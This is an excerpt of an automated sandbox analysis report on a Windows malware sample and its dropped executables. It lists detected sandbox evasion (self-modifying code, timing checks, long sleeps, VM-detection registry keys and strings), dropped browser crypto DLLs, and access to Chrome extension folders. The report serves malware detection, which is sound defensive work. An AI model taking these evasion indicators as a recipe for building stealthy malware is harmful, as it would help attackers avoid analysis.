Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 46DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 495BDC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 475FCC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	Special instruction interceptor: First address: 4FBE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 52DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 555BDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 535FCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 5BBE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: E4DE32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: E75BDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: E55FCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe	Special instruction interceptor: First address: EDBE20 instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe	Special instruction interceptor: First address: C7EA4F instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe	Special instruction interceptor: First address: C7C64E instructions caused by: Self-modifying code
Source: C:\Users\userKFHCAEGCBF.exe	Special instruction interceptor: First address: C7E993 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1CEA4F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1CC64E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 1CE993 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe

Code function: 0_2_04C80CC5 rdtsc

0_2_04C80CC5

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1512	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1563	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 1642	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 943	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 499
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 1077
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 506
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Window / User API: threadDelayed 627

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

API coverage: 2.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7908	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7908	Thread sleep time: -112056s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7916	Thread sleep time: -100050s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7876	Thread sleep count: 337 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7876	Thread sleep time: -10110000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7912	Thread sleep count: 54 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7912	Thread sleep time: -108054s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7896	Thread sleep count: 1719 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7896	Thread sleep time: -3439719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7904	Thread sleep count: 1512 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7904	Thread sleep time: -3025512s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7900	Thread sleep count: 1563 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7900	Thread sleep time: -3127563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892	Thread sleep count: 1466 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7892	Thread sleep time: -2933466s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7996	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 6688	Thread sleep count: 103 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 6688	Thread sleep time: -618000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460	Thread sleep count: 499 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460	Thread sleep count: 1077 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 5460	Thread sleep count: 506 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 3352	Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe TID: 3352	Thread sleep time: -582000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164	Thread sleep count: 270 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164	Thread sleep count: 167 > 30
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe TID: 4164	Thread sleep count: 627 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4456	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4456	Thread sleep time: -30000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread sleep count: Count: 1642 delay: -10			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe	Thread sleep count: Count: 1077 delay: -10

Source: C:\Users\user\Desktop\8NjcvPNvUr.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\userKFHCAEGCBF.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe

Code function: 8_2_6C1DC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

8_2_6C1DC930

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 0000001F.00000002.2936767105.00000000020D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware=z
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: vmware
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, RoamingHJDBKJKFIE.exe, 0000000F.00000002.2581280707.0000000000E2B000.00000040.00000001.01000000.0000000D.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 00000013.00000002.2624518320.0000000000349000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWk+IB
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
